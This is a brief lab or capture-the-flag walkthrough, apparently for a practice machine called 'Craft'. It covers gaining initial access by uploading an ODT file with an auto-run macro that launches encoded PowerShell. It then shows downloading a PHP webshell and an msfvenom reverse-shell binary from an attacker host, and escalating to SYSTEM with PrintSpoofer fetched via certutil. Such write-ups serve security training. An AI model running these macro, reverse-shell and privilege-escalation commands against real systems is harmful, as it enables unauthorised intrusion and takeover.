Craft
Host:
192.168.212.16980
From website: admin@craft.offsec
There is a file upload
We need an ODT file for exploiting
Now create an odt file Then add the macro: Tools-> macros->Organise macros-->Basic
Create a macro 
Sub Main
Shell("cmd /c powershell -e JABjAGwAaQBlAG4Ad...ABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA")
End SubThen we can configure it to open on document open:
Tools-->Customise: 
Now we can upload the file and get a shell:
Shell:
\
Now we find the files for the web server:
We can put a webshell:
wget http://192.168.45.236/shell.php -o shell.phpand make a reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=3001 -f exe -o shell.exewget http://192.168.45.236/shell.exe -o shell.exe
Now we can run it:
Now we get a shell:
\
Now using whoami /priv: 
We can use PrintSpoofer:
certutil -urlcache -f http://192.168.45.236/PrintSpoofer64.exe PrintSpoofer64.exePrintSpoofer.exe -i -c powershell.exeWe get a shell as nt authority\system:
Last updated
Was this helpful?